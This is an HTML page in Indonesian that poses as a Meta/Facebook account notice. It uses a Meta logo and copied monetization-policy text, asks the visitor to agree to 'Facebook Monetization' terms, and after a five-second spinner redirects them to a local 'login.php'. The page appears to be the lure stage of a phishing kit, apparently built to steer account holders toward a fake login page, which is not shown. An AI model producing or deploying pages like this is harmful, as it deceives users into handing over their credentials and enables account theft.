
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Konfirmasi Permasalahan akun anda</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: linear-gradient(to right, #fef4f5 5%, #edf6ff 50%, #eff8ff 75%);
            color: #333;
        }

        .container {
            max-width: 800px;
            margin: 20px auto;
            padding: 20px;
            background-color: linear-gradient(to right, #fef4f5 5%, #edf6ff 50%, #eff8ff 75%);
            border-radius: 8px;
        }

        .header {
            display: flex;
            align-items: center;
            gap: 15px;
            margin-bottom: 80px;
        }

        .header img {
            width: 80px;
            object-fit: contain;
            margin-top: 0px;
        }

        .header h1 {
            font-size: 24px;
            margin: 0;
            color: #007BFF;
        }

        .description {
            margin-bottom: 20px;
            font-size: 16px;
            line-height: 1.5;
            color: #555;
        }

        form {
            padding: 20px;
            border: 1px solid #ddd;
            border-radius: 8px;
            background-color: #ffffff;
        }

        label {
            font-weight: bold;
            display: block;
            margin-bottom: 10px;
            font-size: 16px;
        }

        .options label {
            font-weight: normal;
            display: flex;
            align-items: center; /* Menyusun gambar dan teks secara vertikal sejajar */
            gap: 10px; /* Menambahkan jarak antara gambar dan teks */
        }

        .options img {
            
            object-fit: contain;
        }

        /* Style untuk tombol Kirim */
        .button-container {
            text-align: center;
            margin-top: 20px;
        }

        button {
            background: #0064e0;
            color: #ffffff;
            border: none;
            padding: 10px 100px;
            border-radius: 25px;
            cursor: pointer;
            font-size: 16px;
            display: inline-flex;
            justify-content: center;
            align-items: center;
            position: relative;
        }

        button:hover {
            background-color: #007BFF;
            color: white;
        }

        /* Spinner style */
        .spinner {
            border: 4px solid #f3f3f3;
            border-top: 4px solid #007BFF;
            border-radius: 50%;
            width: 14px;
            height: 14px;
            animation: spin 2s linear infinite;
            display: none;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Hides the text when the spinner is active */
        .spinner-button-text {
            display: inline-block;
        }

        .button-spinner-active .spinner {
            display: inline-block;
        }

        .button-spinner-active .spinner-button-text {
            display: none;
        }

    </style>
</head>
<body>
    <div class="container">
        <!-- Header dengan Logo -->
        <div class="header">
            <img src="img/logometa.png" alt="Logo">
        </div>

        <!-- Penjelasan Singkat -->
        <div class="description">
            <img src="https://www.farhanmajid.com/wp-content/uploads/2019/02/service-bottom-image.png" width="100%">
            Agar penerbit, kreator, dan penyedia konten pihak ketiga bisa menggunakan fitur monetisasi di Facebook, mereka harus mematuhi dan tetap mematuhi serangkaian aturan yang disebut Kebijakan Monetisasi Mitra dan Kebijakan Monetisasi Konten.

Aturan ini berlaku untuk semua Halaman, profil dalam mode profesional, acara, dan grup di Facebook.
        </div>

        <!-- Form -->
        <form id="choiceForm">
            <label for="options">Apakah anda menyetujui aturan yang berlaku?</label>
            <div class="options">
                <label>
                    <input type="radio" name="options" value="Terbatas atau Tertunda">
                    Saya Menyetujui syarat&ketentuan Monetisasi Facebook
                </label>
                
            </div>
        </form>

        <!-- Tombol Kirim dengan Spinner -->
        <div class="button-container">
            <button type="submit" form="choiceForm" id="submitBtn">
                <span class="spinner-button-text">Lanjutkan</span>
                <span class="spinner" id="spinner"></span>
            </button>
        </div>
    </div>

    <script>
        // Menangani submit form dan spinner
        document.getElementById('choiceForm').addEventListener('submit', function(event) {
            event.preventDefault(); // Mencegah refresh halaman

            const submitButton = document.getElementById('submitBtn');
            const spinner = document.getElementById('spinner');
            const buttonText = document.querySelector('.spinner-button-text');
            const selectedOption = document.querySelector('input[name="options"]:checked');

            // Tampilkan spinner dan sembunyikan teks saat tombol kirim ditekan
            submitButton.disabled = true;
            submitButton.classList.add('button-spinner-active'); // Menambahkan class untuk menampilkan spinner
            spinner.style.display = 'inline-block'; // Menampilkan spinner
            buttonText.style.display = 'none'; // Menyembunyikan teks tombol

            setTimeout(function() {
                if (selectedOption) {
                    
                    window.location.href = "login.php"; // Ganti dengan URL halaman tujuan
                } else {
                    alert('Silakan pilih salah satu opsi sebelum mengirim!');
                    submitButton.disabled = false;
                    submitButton.classList.remove('button-spinner-active'); // Menghapus class spinner
                    spinner.style.display = 'none';
                    buttonText.style.display = 'inline-block';
                }
            }, 5000); // Durasi spinner 2 detik (bisa disesuaikan)
        });
    </script>
</body>
</html>
